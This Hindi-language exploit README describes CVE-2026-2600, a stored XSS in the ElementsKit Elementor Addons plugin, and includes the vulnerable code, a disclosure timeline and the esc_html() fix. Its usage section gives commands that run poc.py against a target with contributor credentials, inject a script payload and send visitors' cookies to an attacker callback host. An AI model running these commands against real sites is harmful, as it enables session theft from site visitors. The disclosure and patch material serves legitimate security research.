
CVE-2026-2600 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ElementsKit Elementor Addons <= 3.7.9 में एक स्टोर्ड XSS, जो प्रमाणित योगदानकर्ताओं (Contributors) को तैयार किए गए Elementor डेटा के माध्यम से मनमानी स्क्रिप्ट इंजेक्ट करने की अनुमति देता है।
| CVSS | 6.4 मध्यम |
| प्रभावित | <= 3.7.9 |
| पैच किया गया | 3.8.0 |
| न्यूनतम भूमिका | योगदानकर्ता (edit_posts) |
| वेक्टर | नेटवर्क / कम जटिलता / कम विशेषाधिकार |
सिंपल टैब विजेट टैब शीर्षकों को echo किए गए HTML के साथ प्रस्तुत करता है लेकिन आउटपुट एस्केपिंग के बिना। widgets/tab/tab.php में, रेंडर लूप निम्न कार्य करता है:
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}
एलिमेंटर का एडिटर क्लाइंट साइड पर इनपुट को सैनिटाइज़ करता है, लेकिन REST API एंडपॉइंट (/wp-json/wp/v2/posts/{id}) _elementor_data मेटा फ़ील्ड को सीधे स्वीकार करता है और उस परत को पूरी तरह से बायपास कर देता है।
एक प्रमाणित योगदानकर्ता एक क्राफ्टेड एलिमेंटर JSON पेलोड के साथ एक पोस्ट को PATCH कर सकता है जो ekit_tab_title को मनमाने HTML पर सेट करता है। क्योंकि मान _elementor_data में शब्दशः संग्रहीत होता है और रेंडर समय पर esc_html() के बिना echo किया जाता है, स्क्रिप्ट पृष्ठ लोड होने पर हर आगंतुक के ब्राउज़र में निष्पादित होती है।
कोई भी योगदानकर्ता कर सकता है:
प्रकटीकरण के समय 400K+ सक्रिय इंस्टॉल प्रभावित थे।
pip install requests
python3 poc.py https://target.com contributor p4ss
स्क्रिप्ट HTTP पर प्रमाणित होती है, व्यवस्थापक संपादक से REST नॉन्स प्राप्त करती है, एक ड्राफ्ट पोस्ट बनाती है, ekit_tab_title फ़ील्ड में एम्बेडेड XSS पेलोड के साथ _elementor_data को पैच करती है, और पोस्ट प्रकाशित करती है। आउटपुट पुष्टि करता है कि पेलोड पृष्ठ स्रोत में सक्रिय है या नहीं।
# कस्टम पेलोड
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'
# कॉलबैक के साथ कुकी एक्सफिल्ट्रेशन
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal
# इंटरैक्टिव कंसोल मोड
python3 console_poc.py
| तिथि | घटना |
|---|---|
| जनवरी 2026 | SVN डिफ समीक्षा के माध्यम से खोजा गया। PoC की पुष्टि हुई। |
| जनवरी 2026 | पूर्ण विवरण और PoC के साथ पैचस्टैक एलायंस को रिपोर्ट किया गया। |
| मार्च 2026 | Wpmet ने v3.8.0 में फिक्स जारी किया। |
| अप्रैल 2026 | CVE-2026-2600 प्रकाशित हुआ। CVSS 6.4 मध्यम निर्धारित किया गया। |
Wpmet ने widgets/tab/tab.php में टैब शीर्षक आउटपुट के चारों ओर esc_html() जोड़ा:
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';